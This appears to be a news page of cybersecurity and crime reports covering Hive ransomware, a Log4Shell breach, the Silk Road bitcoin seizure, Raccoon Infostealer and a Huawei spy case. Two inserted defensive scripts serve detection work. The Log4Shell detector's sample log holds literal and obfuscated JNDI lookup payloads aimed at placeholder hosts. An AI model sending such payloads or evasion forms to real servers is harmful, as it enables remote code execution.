Zebeth Media Solutions


Hive ransomware actors have extorted over $100M from victims, says FBI • ZebethMedia

The U.S. government has warned of ongoing malicious activity by the notorious Hive ransomware gang, which has extorted more than $100 million from its growing list of victims.

A joint advisory released on Thursday by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) revealed that the Hive ransomware gang has received upwards of $100 million in ransom payments from over 1,300 victims since the gang was first observed in June 2021. The victims span a wide range of industries and critical infrastructure sectors, including government facilities, communications, and information technology, with a particular focus on healthcare and public health entities.

Hive, which operates a ransomware-as-a-service (RaaS) model, claimed the Illinois-based Memorial Health System as its first healthcare victim in August 2021. That attack forced the health system to divert emergency patients and cancel urgent care surgeries and radiology exams. The gang also released sensitive health information belonging to about 216,000 patients.

Then, in June 2022, the gang compromised Costa Rica’s public health service before targeting New York-based emergency response and ambulance service provider Empress EMS the following month. Over 320,000 individuals had information stolen, including names, dates of service, insurance information, and Social Security numbers.

Just last month, Hive also added Lake Charles Memorial Health System, a hospital system in Southwest Louisiana, to its dark web leak site, where it posted hundreds of gigabytes of data, including patient and employee information. Hive also targeted Tata Power, a top power generation company in India, in October.
The joint FBI-CISA-HHS advisory warns that Hive typically gains access to victim networks by using stolen single-factor credentials against organizations’ remote desktop systems, virtual private networks, and other internet-facing systems. CISA also warns that the group has skirted some multi-factor authentication systems by exploiting unpatched vulnerabilities. “In some cases, Hive actors have bypassed multi-factor authentication and gained access to FortiOS servers by exploiting CVE-2020-12812,” the advisory says. “This vulnerability enables a malicious cyber-actor to log in without a prompt for the user’s second authentication factor (FortiToken) when the actor changes the case of the username.”

The advisory also warns that Hive actors have been observed reinfecting victims that restored their environments without paying a ransom, either with Hive or with another ransomware variant.

Microsoft’s Threat Intelligence Center (MSTIC) researchers warned earlier this year that Hive had upgraded its malware by migrating its code from Go to the Rust programming language, enabling it to use a more complex encryption method for its ransomware-as-a-service payload.

The U.S. government shared Hive indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) discovered by the FBI to help defenders detect malicious activity associated with Hive affiliates and reduce or eliminate the impact of such incidents.
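The FortiOS bypass the advisory quotes leaves a trace a defender can hunt for: a successful login whose username matches a directory account only case-insensitively, and which completed without a second factor. The script below is an added example written for this page, not code from the advisory, the FBI, or the article. Its log layout, usernames and addresses are constructed for illustration (it is not FortiOS’s real log schema); the same check applies to any authentication log that records the username as typed.

```python
"""Hunt for successful logins whose username matches the directory only
case-insensitively, the pattern CVE-2020-12812 abuses on FortiOS.

This is an added example, not code from the advisory or the article. The
log layout, usernames and addresses below are constructed for illustration;
this is not FortiOS's real log schema. The check applies to any
authentication log that records the username as typed: take the canonical
spelling from your directory, then flag any successful login whose username
differs from it only in case, and any success that did not present a
second factor.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Canonical usernames as provisioned in the directory (constructed sample).
DIRECTORY = ("jsmith", "mlee", "Admin.Ops")

# Constructed sample lines; the field layout is illustrative only.
SAMPLE_LOG = """\
2022-11-10T08:12:03Z vpn-login user="jsmith" result=success factors=2 src=198.51.100.7
2022-11-10T08:40:19Z vpn-login user="JSmith" result=success factors=1 src=203.0.113.44
2022-11-10T09:02:55Z vpn-login user="mlee" result=failure factors=0 src=203.0.113.44
2022-11-10T09:03:10Z vpn-login user="MLEE" result=success factors=1 src=203.0.113.44
2022-11-10T09:30:00Z vpn-login user="Admin.Ops" result=success factors=2 src=198.51.100.9
2022-11-10T10:11:42Z vpn-login user="nobody" result=success factors=1 src=203.0.113.44
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) vpn-login user="(?P<user>[^"]*)" result=(?P<result>\w+) '
    r"factors=(?P<factors>\d+) src=(?P<src>\S+)$"
)


@dataclass(frozen=True)
class Finding:
    ts: str
    user_as_typed: str
    canonical: Optional[str]  # None when the name is not in the directory
    src: str
    reasons: Tuple[str, ...]


def canonical_map(directory: Iterable[str]) -> Dict[str, str]:
    """Map lowercase username -> spelling provisioned in the directory."""
    return {u.lower(): u for u in directory}


def hunt(log_text: str, directory: Iterable[str] = DIRECTORY) -> List[Finding]:
    """Return one Finding per suspicious successful login, in log order."""
    canon = canonical_map(directory)
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["result"] != "success":
            continue  # failures are noise here; the bypass yields a success
        typed = m["user"]
        canonical = canon.get(typed.lower())
        reasons = []
        if canonical is None:
            reasons.append("success for user not in directory")
        elif typed != canonical:
            # Same account, different case: exactly what the bypass relies on.
            reasons.append("case-variant username")
        if int(m["factors"]) < 2:
            reasons.append("second factor not presented")
        if reasons:
            findings.append(Finding(m["ts"], typed, canonical, m["src"], tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.ts} {f.user_as_typed!r} (directory: {f.canonical!r}) "
              f"from {f.src}: {', '.join(f.reasons)}")
```

On the sample above, the two case-variant single-factor logins and the success for an unknown account are reported; the two canonical logins that presented two factors are not. Treat hits as hunt leads rather than verdicts: some directories are case-insensitive and users do mistype case, so correlate with the source address and with whether the appliance was actually patched. The fix for the bypass itself is the FortiOS update, not the detection.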

Iran-backed hackers breached a US federal agency that failed to patch year-old bug • ZebethMedia

The U.S. government’s cybersecurity agency says hackers backed by the Iranian government compromised a federal agency that failed to patch against Log4Shell, a vulnerability fixed almost a year ago.

In an alert published Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal civilian executive branch (FCEB) organization was breached by Iranian government hackers in February. CISA did not name the breached FCEB agency, a list that includes the likes of the Department of Homeland Security, the Department of the Treasury, and the Federal Trade Commission, and CISA spokesperson Michael Feldman declined to comment when reached by ZebethMedia.

CISA said it first observed the suspected activity on the unnamed federal agency’s network months later, in April, while conducting retrospective analysis using Einstein, a government-run intrusion detection system used to protect federal civilian agency networks. The agency found that the hackers had exploited Log4Shell, a critical zero-day vulnerability in the ubiquitous open-source logging library Log4j, on an unpatched VMware Horizon server to gain initial access to the organization’s network with administrator and system-level privileges. This compromise happened even though CISA had ordered all federal civilian agencies to patch their systems affected by the Log4Shell vulnerability by December 23.

Once inside the organization’s network, CISA observed that the threat actors installed XMRig, open-source crypto mining software that is commonly abused by hackers to mine virtual currency on compromised computers. The attackers also installed Mimikatz, an open-source credential stealer, to harvest passwords and to create a new domain administrator account. Using this newly created account, the hackers disabled Windows Defender and implanted Ngrok reverse proxies on several hosts in order to maintain their access in the future.
The attackers also changed the password for the local administrator account on several hosts as a fallback should the rogue domain administrator account be detected and removed.

It is not clear why the hackers targeted the U.S. federal agency. Broad access to an organization’s network can be used both for espionage and for launching destructive attacks. CISA, which has not attributed the breach to a particular advanced persistent threat (APT) group, shared indicators of compromise (IOCs) to help network defenders detect and protect against similar compromises.

CISA also said that organizations that haven’t yet patched VMware systems against Log4Shell should assume that they have already been breached, and advised them to start hunting for malicious activity within their networks. The agency also urges organizations to keep all software up to date and to prevent users from using known compromised passwords.
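CISA’s advice to assume compromise and hunt starts with the request logs of the internet-facing Java application, where a Log4Shell attempt shows up as a JNDI lookup string in a logged field such as the User-Agent. The script below is an added example written for this page, not code from CISA, the agency, or the article, and it is not the agency’s IOCs. Its access-log lines and attacker addresses are constructed for illustration. It goes beyond the text in one respect: because Log4j resolves nested lookups before the JNDI one fires, an exploit string need not contain a literal `${jndi:`, so the detector folds the `${lower:…}`, `${upper:…}` and `${…:-…}` forms before matching.

```python
"""Hunt web/application request logs for Log4Shell (Log4j JNDI lookup) probes.

Added example, not from the CISA alert or the article, and not the agency's
IOCs. The access-log lines are constructed for illustration and the
attacker hosts are documentation addresses. The point it makes beyond the
text: an exploit string need not read "${jndi:" literally. Log4j resolves
nested lookups before the JNDI one fires, so "${${lower:j}ndi:" and
"${${::-j}ndi:" are the same payload, and a detector must fold those
forms first.
"""
import re
from typing import Dict, List

# Literal or folded "${jndi:" token, and the scheme that follows it (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
SCHEME_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Two lookup forms used to hide the token (a generalization of the text):
#   ${lower:X} / ${upper:X}   -> X case-folded
#   ${anything:-X}            -> default value X, e.g. "${::-j}" or "${env:NOPE:-j}"
CASE_RE = re.compile(r"\$\{(lower|upper):([^}$]*)\}", re.IGNORECASE)
DEFAULT_RE = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")

# Constructed sample access log (combined format); line 5 has a lookup but no JNDI.
SAMPLE_LOG = r'''
192.0.2.10 - - [14/Dec/2021:10:02:11 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.11 - - [14/Dec/2021:10:02:40 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "${jndi:ldap://203.0.113.5:1389/a}"
192.0.2.12 - - [14/Dec/2021:10:03:05 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.5:1389/a}"
192.0.2.13 - - [14/Dec/2021:10:03:30 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/x}"
192.0.2.14 - - [14/Dec/2021:10:04:00 +0000] "GET /portal/?q=${env:HOME:-safe} HTTP/1.1" 200 1234 "-" "curl/7.68.0"
'''.strip()


def normalize_lookups(s: str, max_rounds: int = 20) -> str:
    """Fold innermost lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        folded = CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        folded = DEFAULT_RE.sub(lambda m: m.group(1), folded)
        if folded == s:
            break
        s = folded
    return s


def scan_log(text: str) -> List[Dict]:
    """Return one hit per log line containing a (possibly obfuscated) JNDI lookup."""
    hits: List[Dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        decoded = normalize_lookups(line)
        m = JNDI_RE.search(decoded)
        if not m:
            continue
        end = decoded.find("}", m.start())
        stop = end + 1 if end != -1 else len(decoded)
        payload = decoded[m.start():stop]
        sm = SCHEME_RE.match(payload)
        hits.append({
            "line": lineno,
            "payload": payload,                      # folded form, e.g. ${jndi:ldap://...}
            "scheme": sm.group(1).lower() if sm else None,
            "obfuscated": decoded != line,           # nested lookups had to be folded
        })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        flag = "obfuscated" if h["obfuscated"] else "literal"
        print(f"line {h['line']}: {flag} {h['scheme']} lookup -> {h['payload']}")
```

On the sample, lines 2 to 4 are reported with the folded payload and the scheme (`ldap`, `ldap`, `rmi`), while the request on line 5 is not, because its lookup resolves to plain text rather than a JNDI reference. A hit shows that someone probed the server, not that exploitation succeeded; the outbound LDAP or RMI connection from the Horizon host to the address in the payload, and the post-exploitation activity described above, are what confirm it.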

US DOJ announces seizure of $3.36B in cryptocurrency • ZebethMedia

The U.S. Department of Justice on Monday announced that law enforcement had seized $3.36 billion of bitcoin from a man who “unlawfully obtained” over 50,000 bitcoin from the darkweb market Silk Road over a decade ago.

The U.S. Attorney for the Southern District of New York said that James Zhong of Gainesville, Georgia, pleaded guilty on November 4 to committing wire fraud in September 2012. The charge carries a maximum sentence of 20 years in prison.

The plea came almost a year after law enforcement seized 50,676.17851897 bitcoin, then valued at over $3.36 billion, from Zhong’s home, the statement said. Officials found the bitcoin in an underground floor safe and on a single-board computer that was hidden under blankets in a popcorn tin placed in a bathroom closet. Law enforcement also recovered $661,900 in cash, 25 Casascius coins of bitcoin (valued at about 174 bitcoin), an additional 11.116 bitcoin, and a handful of silver- and gold-colored bars.

The whereabouts of this massive amount of bitcoin was a mystery for almost 10 years, U.S. Attorney Damian Williams said in the release. It was the largest cryptocurrency seizure in the history of the U.S. DOJ at the time, and today remains the department’s second-largest financial seizure, the release stated.

Silk Road was an online black market launched in 2011 by the then-anonymous “Dread Pirate Roberts” (later unmasked as Ross Ulbricht). It was notorious for money laundering and for the buying and selling of illegal drugs with bitcoin. In under two years, Silk Road was shut down by the U.S. government, and by 2015 Ulbricht had been unanimously convicted by a jury and sentenced to life in prison.

“This case shows that we won’t stop following the money, no matter how expertly hidden, even to a circuit board in the bottom of a popcorn tin,” Williams said.

US charges Ukrainian national over alleged role in Raccoon Infostealer malware operation • ZebethMedia

U.S. officials have charged a Ukrainian national over his alleged role in the Raccoon Infostealer malware-as-a-service operation that infected millions of computers worldwide.

Mark Sokolovsky, also known online as “raccoonstealer” according to an indictment unsealed on Tuesday, is currently being held in the Netherlands while awaiting extradition to the United States. The U.S. Department of Justice accused Sokolovsky of being one of the “key administrators” of Raccoon Infostealer, a form of Windows malware that steals passwords, credit card numbers, saved username and password combinations, and granular location data.

Raccoon Infostealer was leased to individuals for approximately $200 per month, the DOJ said, paid to the malware’s operators in cryptocurrency, typically Bitcoin. These individuals employed various tactics, such as COVID-19-themed phishing emails and malicious web pages, to install the malware on the computers of unsuspecting victims. The malware then stole personal data from those computers, including login credentials, bank account details, cryptocurrency addresses, and other personal information, which was used to commit financial crimes or sold to others on cybercrime forums.

[Image: an example of one of the phishing emails sent by the crime group. Image Credits: U.S. Justice Department.]

According to U.S. officials, the malware has stolen more than 50 million unique credentials and forms of identification from victims around the world since February 2019. These victims include a financial technology company based in Texas and an individual who had access to U.S. Army information systems, according to the unsealed indictment. Cybersecurity firm Group-IB said the malware may have been used to steal employee credentials during the recent Uber breach.
But the DOJ said it “does not believe it is in possession of all the data stolen by Raccoon Infostealer and continues to investigate.”

The Justice Department said it worked with European law enforcement to dismantle the IT infrastructure powering Raccoon Infostealer in March 2022, when Dutch authorities arrested Sokolovsky. According to one report, the malware operation claimed it was suspending operations after one of its lead developers was allegedly killed during Russia’s invasion of Ukraine. A new version of Raccoon Infostealer was reportedly launched in June this year.

The FBI also announced on Tuesday that it has created a website that allows anyone to check whether their data is contained in the U.S. government’s archive of information stolen by Raccoon Infostealer.

“This case highlights the importance of the international cooperation that the Department of Justice and our partners use to dismantle modern cyber threats,” said Deputy Attorney General Lisa O. Monaco. “As reflected in the number of potential victims and global breadth of this attack, cyber threats do not respect borders, which makes international cooperation all the more critical. I urge anyone who thinks they could be a victim to follow the FBI’s guidance on how to report your potential exposure.”

Sokolovsky is charged with computer fraud, wire fraud, money laundering, and identity theft, and faces up to 20 years in prison if found guilty. The DOJ said Sokolovsky is appealing a September 2022 decision by the Amsterdam District Court granting his extradition to the United States.

US charges two alleged Chinese spies over plot to obstruct Huawei prosecution • ZebethMedia

The U.S. Department of Justice (DOJ) has unsealed charges against two alleged PRC spies who are accused of attempting to obstruct a federal prosecution of Chinese telecommunications giant Huawei.

In a criminal complaint dated October 20 and made public on Monday, the U.S. claims that two Chinese intelligence officers, Guochun He (known as “Dong He”) and Zheng Wang (known as “Zen Wang”), attempted to bribe a U.S. law enforcement official to obtain what they believed was inside information about the U.S. criminal case against a “global telecommunications company based in China.” The complaint doesn’t name the company, but the details match the known prosecution of Huawei. Huawei did not respond to a request for comment.

The complaint alleges that He and Wang “attempted to direct a person they believed they recruited as an asset” inside a U.S. government law enforcement agency “to obtain confidential information regarding potential new charges to be brought against [Huawei] for the purpose of obstructing justice.” The government alleges that He and Wang first cultivated their relationship with the law enforcement employee, who is not named, in February 2017, but that the person “subsequently began working as a double agent for the U.S. government.”

The men are accused of attempting to extract confidential information about witnesses and trial evidence in the Huawei case, and of paying the double agent, referred to as “GE-1,” $61,000 in bitcoin, cash and jewelry for what they believed was insider information about the Justice Department’s pending prosecution of the China-based company. At one point in October 2021, the complaint alleges, the double agent passed one of the Chinese intelligence officers a single-page document, classified “SECRET,” that detailed U.S. plans to arrest two Huawei principals living in China. They paid the double agent $41,000 for that single page alone.
“Far more than an effort to collect information or intelligence, the actions of the PRC intelligence officers charged in this case must be called out for what they are: an extraordinary intervention by agents of a foreign government to interfere with the integrity of the U.S. criminal justice system, compromise a U.S. government employee and obstruct the enforcement of U.S. law to benefit a PRC-based commercial enterprise,” said Assistant Attorney General for National Security Matthew G. Olsen. “The Department of Justice will not abide nation-state actors meddling in U.S. criminal process and investigations, and will not tolerate foreign interference with the fair administration of justice.”

If convicted, He and Wang face up to 60 years and 20 years in prison, respectively.

The case was one of three unsealed on Monday relating to alleged Chinese interference in the U.S. justice system. One, in New Jersey, charges three Chinese intelligence agents with conspiring to act in the U.S. as illegal agents on behalf of a foreign government, while another, in the Eastern District of New York, accuses several people working on behalf of the Chinese government of “engaging in a multi-year campaign of threats and harassment to force a U.S. resident to return to China,” Attorney General Merrick Garland said Monday.
